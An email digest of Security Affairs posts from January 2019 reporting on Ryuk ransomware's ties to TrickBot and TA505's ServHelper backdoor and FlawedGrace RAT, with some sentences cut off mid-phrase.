- Which is the link between Ryuk ransomware and TrickBot?
- Security Affairs newsletter Round 196 – News of the week
- TA505 Group adds new ServHelper Backdoor and FlawedGrace RAT to its arsenal
Posted: 13 Jan 2019 09:43 PM PST
FireEye and CrowdStrike discovered that threat actors behind the Ryuk ransomware are working with another cybercrime gang to gain access to target networks.
In August 2018, security experts from Check Point uncovered a ransomware-based campaign aimed at organizations around the world conducted by North Korea-linked threat actor. This is the first time that a security firm detected the Ryuk Ransomware.
The campaign appears as targeted and well-planned, threat actors targeted several enterprises and encrypted hundreds of PC, storage and data centers in each infected company.
Some organizations paid an exceptionally large ransom in order to retrieve the encrypted files, CheckPoint confirmed that the ransom amount paid by the victims ranged between 15 BTC to 50 BTC.
At least three organizations in the United States and worldwide were severely affected, the attackers are estimated to have already netted over $640,000 to date.
The same ransomware was recently used in an attack that affected the newspaper distribution for large major newspapers, including the Wall Street Journal, the New York Times, and the Los Angeles Times.
Further investigation on the malware allowed the experts from security firms FireEye and CrowdStrike to discover that threat actors behind the
Experts at Crowdstrike believe the Ryuk ransomware is operated by a crime gang they tracked as GRIM SPIDER, in particular by its Russian based cell dubbed WIZARD SPIDER that is behind TrickBot.
“GRIM SPIDER is a sophisticated eCrime group that has been operating the Ryuk ransomware since August 2018, targeting large organizations for a high-ransom return. This methodology, known as "big game hunting," signals a shift in operations for WIZARD SPIDER, a criminal enterprise of which GRIM SPIDER appears to be a cell.” reads the report published by
“The WIZARD SPIDER threat group, known as the Russia-based operator of the TrickBot banking malware, had focused primarily on wire fraud in the past.”
FireEye is tracking the same financially-motivated activity as TEMP.MixMaster which involved attackers using the Ryuk ransomware associated with TrickBot infections.
The circumstance suggests that TrickBot operators are adopting the crime-as-a-service model to offer access to systems they have
“It is important to note that TEMP.MixMaster is solely a reference to incidents where we have seen Ryuk deployed following TrickBot infections and that not all TrickBot infections will lead to the deployment of Ryuk ransomware.” reads the post published by FireEye.
“The TrickBot administrator group, which is suspected to be based in Eastern Europe, most likely provide the malware to a limited number of cyber criminal actors to use in operations,”
FireEye experts observed malspam campaign distributing Ryuk that used messages pretending to be a Deloitte payroll schedule.
“Once a victim opened the attachment and enabled macros, it downloaded and executed an instance of the TrickBot malware from a remote server.” continues FireEye.
“Data obtained from FireEye technologies suggests that although different documents may have been distributed by this particular malicious spam run, the URLs from which the documents attempted to retrieve a secondary payload did not vary across attachments or recipients, despite the campaign's broad distribution both geographically and across industry verticals.”
Attackers used the PowerShell post-exploitation toolkit called Empire. Empire to distribute payloads through the accessed network.
Empire allows to steal credentials on other computers in the network and then install the Ryuk Ransomware on them.
The investigations conducted by FireEye, CrowdStrike, McAfee seems to exclude that Ryuk is associated with North Korea, the experts believe threat actors behind the ransomware are from Russia.
According to McAfee, initial attribution to North Korea might be wrong because only based on the code similarities between Ryuk and Hermes. The experts pointed out that in August 2017, the Hermes ransomware was being sold online on Exploit.in by a Russian speaking actor.
Likely, the Lazarus Group bought the ransomware and used it in its operations to make hard the attribution of the operation.
(SecurityAffairs – hacking, Ryuk ransomware)
The post Which is the link between Ryuk ransomware and TrickBot? appeared first on Security Affairs.
Posted: 13 Jan 2019 07:43 AM PST
A new round of the weekly SecurityAffairs newsletter arrived!
The best news of the week with Security Affairs.
Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal
Once again thank you!
(SecurityAffairs – newsletter)
The post Security Affairs newsletter Round 196 – News of the week appeared first on Security Affairs.
Posted: 13 Jan 2019 06:42 AM PST
Proofpoint analyzed two strains of malware tracked as ServHelper and FlawedGrace distributed through phishing campaigns by the TA505 crime gang.
Security researchers at Proofpoint researchers discovered two strains of malware tracked as ServHelper and FlawedGrace distributed through phishing campaigns by the TA505 crime gang.
The ServHelper is a backdoor, experts analyzed two variants of it, while FlawedGrace is a remote access trojan (RAT).
“In November 2018, TA505, a prolific actor that has been at the forefront of this trend, began
“Additionally we have observed the downloader variant download a malware we call "FlawedGrace." FlawedGrace is a full-featured RAT that we first observed in November 2017.”
The TA505 group was first spotted by Proofpoint back 2017, it has been active at least since 2015 and targets organizations in financial and retail industries.
The group carried out a large number of campaigns using weaponized Office and PDF documents to deliver notorious malware, including
In November experts observed several campaigns carried out by the
One of the largest campaigns distributed tens of thousands of emails and leveraged
On December 13, Proofpoint observed a third campaign spreading the ServHelper backdoor.
“On December 13, 2018, we observed another large ServHelper "downloader" campaign targeting retail and financial services customers.” reads the analysis published by Proofpoint.
“The messages used a mixture of Microsoft Word attachments with embedded malicious macros, PDF attachments with URLs linking to a fake "Adobe PDF Plugin" webpage linking to the malware, and direct URLs in the email body linking to a ServHelper executable.”
The attacks leveraging the two malware were not targeted in nature attackers aimed at financial services organizations worldwide.
Once downloaded the ServHelper backdoor set up reverse SSH tunnels that allow attackers to access to the infected system via Remote Desktop Protocol (RDP) on port 3389.
“As noted, there are two distinct variants of ServHelper: a "tunnel" variant and a "downloader" variant. The "tunnel" variant has more features and focuses on setting up reverse SSH tunnels to allow the threat actor to access the infected host via Remote Desktop Protocol (RDP). ”
“Once ServHelper establishes remote desktop access, the malware contains functionality for the threat actor to "hijack" legitimate user accounts or their web browser profiles and use them as they see fit,”
Experts also discovered another ServHelper variant that does not include the tunneling and hijacking capabilities, in this case, the backdoor was used only as a downloader for the FlawedGrace RAT.
The threat actors use the .bit Top-Level Domain (TLD) for the Domain Name System (DNS) servers. The support for ".bit" C&C domains was added to protect the C2 infrastructure, this TLD is associated with the cryptocurrency Namecoin and requires special DNS servers that the malware uses (dedsolutions[.]bit, arepos[.]bit).null
The .bit TLD is not controlled by ICANN this means that it is impossible to ask the organization to shu down a fraudulent domain used as C2.
The TA505 group also use the FlawedGrace RAT, the malware is written in C++ and according to Proofpoint its coding style and techniques it implements suggest that RAT and ServHelper were developed by different groups.
“Threat actor TA505 is both consistent and prolific. When the group distributes new malware, it may be a blip (like Bart ransomware, which was only distributed for one day in 2016) or like Locky ransomware it may become the dominant strain of malware in the wild. In this case, the group has started distributing two variants on a new backdoor we named ServHelper and a RAT we call FlawedGrace.” concluded Proofpoint.
“This also extends the trend that emerged in 2018, in which threat actors increasingly focused on
(SecurityAffairs – TA505, cybercrime)
The post TA505 Group adds new ServHelper Backdoor and FlawedGrace RAT to its arsenal appeared first on Security Affairs.
|You are subscribed to email updates from Security Affairs. |
To stop receiving these emails, you may unsubscribe now.
|Email delivery powered by Google|
|Google, 1600 Amphitheatre Parkway, Mountain View, CA 94043, United States|